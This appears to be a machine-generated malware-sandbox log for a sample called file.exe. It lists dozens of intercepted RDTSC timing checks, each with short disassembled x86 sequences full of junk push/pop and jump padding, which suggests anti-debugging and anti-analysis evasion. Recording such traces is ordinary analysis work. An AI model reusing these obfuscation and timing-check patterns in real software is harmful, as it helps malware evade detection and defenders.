Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7B8A82 second address: 7B8A86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7B9837 second address: 7B983C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7B8A86 second address: 7B8A8A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7B983C second address: 7B9852 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b jp 00007FF0EC517C78h 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7B8A8A second address: 7B8A90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7B8A90 second address: 7B8A95 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7BA739 second address: 7BA73D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7BA73D second address: 7BA7A2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0EC517C87h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a nop 0x0000000b sub dword ptr [ebp+122D32AEh], edi 0x00000011 push 00000000h 0x00000013 cmc 0x00000014 push 00000000h 0x00000016 push 00000000h 0x00000018 push edi 0x00000019 call 00007FF0EC517C78h 0x0000001e pop edi 0x0000001f mov dword ptr [esp+04h], edi 0x00000023 add dword ptr [esp+04h], 00000014h 0x0000002b inc edi 0x0000002c push edi 0x0000002d ret 0x0000002e pop edi 0x0000002f ret 0x00000030 push edx 0x00000031 add dword ptr [ebp+122D1D83h], edi 0x00000037 pop ebx 0x00000038 mov edi, dword ptr [ebp+122D3C72h] 0x0000003e xchg eax, esi 0x0000003f push eax 0x00000040 push edx 0x00000041 pushad 0x00000042 pushad 0x00000043 popad 0x00000044 jmp 00007FF0EC517C7Ch 0x00000049 popad 0x0000004a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7BA7A2 second address: 7BA7A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7BB82B second address: 7BB830 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7BB9C3 second address: 7BB9CD instructions: 0x00000000 rdtsc 0x00000002 jno 00007FF0EC6B64C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7BB9CD second address: 7BBA64 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0EC517C84h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push dword ptr fs:[00000000h] 0x00000011 movsx ebx, si 0x00000014 mov dword ptr fs:[00000000h], esp 0x0000001b mov ebx, eax 0x0000001d mov eax, dword ptr [ebp+122D16CDh] 0x00000023 ja 00007FF0EC517C79h 0x00000029 push FFFFFFFFh 0x0000002b call 00007FF0EC517C83h 0x00000030 mov dword ptr [ebp+122D212Bh], eax 0x00000036 pop ebx 0x00000037 pushad 0x00000038 jnc 00007FF0EC517C7Ch 0x0000003e mov dword ptr [ebp+122D30FFh], ecx 0x00000044 popad 0x00000045 nop 0x00000046 jmp 00007FF0EC517C7Ch 0x0000004b push eax 0x0000004c push eax 0x0000004d push edx 0x0000004e pushad 0x0000004f jmp 00007FF0EC517C88h 0x00000054 push ecx 0x00000055 pop ecx 0x00000056 popad 0x00000057 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7BE90F second address: 7BE913 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7BE913 second address: 7BE919 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7C07AD second address: 7C07B3 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7C1738 second address: 7C179E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0EC517C85h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a nop 0x0000000b mov dword ptr [ebp+1246077Dh], edi 0x00000011 push 00000000h 0x00000013 push 00000000h 0x00000015 push esi 0x00000016 call 00007FF0EC517C78h 0x0000001b pop esi 0x0000001c mov dword ptr [esp+04h], esi 0x00000020 add dword ptr [esp+04h], 00000016h 0x00000028 inc esi 0x00000029 push esi 0x0000002a ret 0x0000002b pop esi 0x0000002c ret 0x0000002d jmp 00007FF0EC517C87h 0x00000032 push 00000000h 0x00000034 mov dword ptr [ebp+12460796h], ecx 0x0000003a xchg eax, esi 0x0000003b push eax 0x0000003c push edx 0x0000003d push edx 0x0000003e push eax 0x0000003f push edx 0x00000040 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7C179E second address: 7C17A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7C17A3 second address: 7C17AE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jns 00007FF0EC517C76h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7C17AE second address: 7C17C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 push edi 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c pop edi 0x0000000d pushad 0x0000000e jmp 00007FF0EC6B64CAh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7BF9C9 second address: 7BF9CE instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7C0958 second address: 7C095D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7C19D3 second address: 7C19D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7C459B second address: 7C459F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7C459F second address: 7C45A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7C2771 second address: 7C2775 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7C2775 second address: 7C277B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7C4C9F second address: 7C4CA5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7C4CA5 second address: 7C4CAB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7C4CAB second address: 7C4CAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7C5D4C second address: 7C5D55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7C5D55 second address: 7C5D59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7C4ED1 second address: 7C4ED6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7C4ED6 second address: 7C4EDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7C5E18 second address: 7C5E31 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 je 00007FF0EC517C76h 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FF0EC517C7Ah 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7CE750 second address: 7CE756 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7CE756 second address: 7CE762 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FF0EC517C76h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7CE1F3 second address: 7CE20D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0EC6B64D6h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7D1C96 second address: 7D1CFC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0EC517C7Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e push ebx 0x0000000f jmp 00007FF0EC517C85h 0x00000014 pop ebx 0x00000015 mov eax, dword ptr [eax] 0x00000017 jp 00007FF0EC517C8Eh 0x0000001d mov dword ptr [esp+04h], eax 0x00000021 pushad 0x00000022 pushad 0x00000023 jno 00007FF0EC517C76h 0x00000029 jnp 00007FF0EC517C76h 0x0000002f popad 0x00000030 push eax 0x00000031 push edx 0x00000032 pushad 0x00000033 popad 0x00000034 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7D1E11 second address: 7D1E17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7D1E17 second address: 7D1E25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a pushad 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7D1E25 second address: 7D1E2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7D1F0C second address: 7D1F10 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7D1F10 second address: 7D1F16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7D1F16 second address: 7D1F80 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0EC517C86h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FF0EC517C87h 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 jmp 00007FF0EC517C88h 0x00000018 mov eax, dword ptr [eax] 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007FF0EC517C87h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7D1F80 second address: 7D1F84 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7D1F84 second address: 7D1F8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7D1F8D second address: 7D1FA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jnp 00007FF0EC6B64C8h 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7D3296 second address: 7D32B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FF0EC517C76h 0x0000000a push esi 0x0000000b pop esi 0x0000000c popad 0x0000000d push edx 0x0000000e push eax 0x0000000f pop eax 0x00000010 jmp 00007FF0EC517C7Fh 0x00000015 pop edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7D32B6 second address: 7D32D6 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FF0EC6B64C8h 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007FF0EC6B64D2h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 770EBB second address: 770EEF instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jng 00007FF0EC517C76h 0x0000000d jmp 00007FF0EC517C7Ah 0x00000012 popad 0x00000013 popad 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FF0EC517C88h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7D8EE2 second address: 7D8F18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 pushad 0x00000007 pushad 0x00000008 jmp 00007FF0EC6B64CFh 0x0000000d pushad 0x0000000e popad 0x0000000f ja 00007FF0EC6B64C6h 0x00000015 popad 0x00000016 jmp 00007FF0EC6B64CBh 0x0000001b pushad 0x0000001c jc 00007FF0EC6B64C6h 0x00000022 pushad 0x00000023 popad 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7D94BE second address: 7D94C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7D94C2 second address: 7D94C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7D9648 second address: 7D964C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7D964C second address: 7D967D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jnl 00007FF0EC6B64C6h 0x0000000d jmp 00007FF0EC6B64D8h 0x00000012 push edx 0x00000013 pop edx 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 popad 0x00000018 pushad 0x00000019 pushad 0x0000001a pushad 0x0000001b popad 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7D967D second address: 7D9685 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7D9967 second address: 7D996B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7D996B second address: 7D9977 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a push edi 0x0000000b pop edi 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7D9ADF second address: 7D9B1A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0EC6B64D8h 0x00000007 jmp 00007FF0EC6B64D7h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 je 00007FF0EC6B64C6h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7D9B1A second address: 7D9B1E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7D9F39 second address: 7D9F59 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnc 00007FF0EC6B64C6h 0x00000009 push edx 0x0000000a pop edx 0x0000000b push esi 0x0000000c pop esi 0x0000000d push esi 0x0000000e pop esi 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 jc 00007FF0EC6B64EAh 0x00000018 jnp 00007FF0EC6B64D2h 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7D9F59 second address: 7D9F5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7D9F5F second address: 7D9F6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jno 00007FF0EC6B64C6h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 76705E second address: 767069 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 772A11 second address: 772A22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FF0EC6B64C6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f push edx 0x00000010 pop edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7E38BC second address: 7E38C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7E3A5D second address: 7E3A62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7E434C second address: 7E4350 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7E4350 second address: 7E4354 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7E4354 second address: 7E435A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7E435A second address: 7E435F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7E435F second address: 7E4393 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF0EC517C7Fh 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007FF0EC517C88h 0x00000010 popad 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push ecx 0x00000014 push esi 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7E47C3 second address: 7E47E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jnl 00007FF0EC6B64C6h 0x0000000c jmp 00007FF0EC6B64CDh 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 jp 00007FF0EC6B64C6h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7EAA78 second address: 7EAA7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7EAA7E second address: 7EAA8A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7EAA8A second address: 7EAA90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7EAA90 second address: 7EAA94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7EAA94 second address: 7EAABE instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FF0EC517C76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b pushad 0x0000000c pushad 0x0000000d push edx 0x0000000e pop edx 0x0000000f pushad 0x00000010 popad 0x00000011 jmp 00007FF0EC517C7Ah 0x00000016 popad 0x00000017 pushad 0x00000018 jmp 00007FF0EC517C7Bh 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7EAABE second address: 7EAAC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7EAAC4 second address: 7EAAD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jl 00007FF0EC517C76h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7EAAD1 second address: 7EAAE0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0EC6B64CBh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7E95E5 second address: 7E95ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7E95ED second address: 7E95F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7E9C9E second address: 7E9CBE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007FF0EC517C76h 0x0000000a jmp 00007FF0EC517C86h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7E9CBE second address: 7E9CCC instructions: 0x00000000 rdtsc 0x00000002 jne 00007FF0EC6B64C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7E9CCC second address: 7E9CD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7E9CD2 second address: 7E9CD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7E9E28 second address: 7E9E51 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FF0EC517C82h 0x00000008 jmp 00007FF0EC517C82h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7E9E51 second address: 7E9E59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7EA143 second address: 7EA147 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7EA2C2 second address: 7EA2DD instructions: 0x00000000 rdtsc 0x00000002 jc 00007FF0EC6B64C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jns 00007FF0EC6B64CAh 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7EA2DD second address: 7EA2E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7EA2E3 second address: 7EA2E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7EA2E7 second address: 7EA306 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0EC517C89h 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
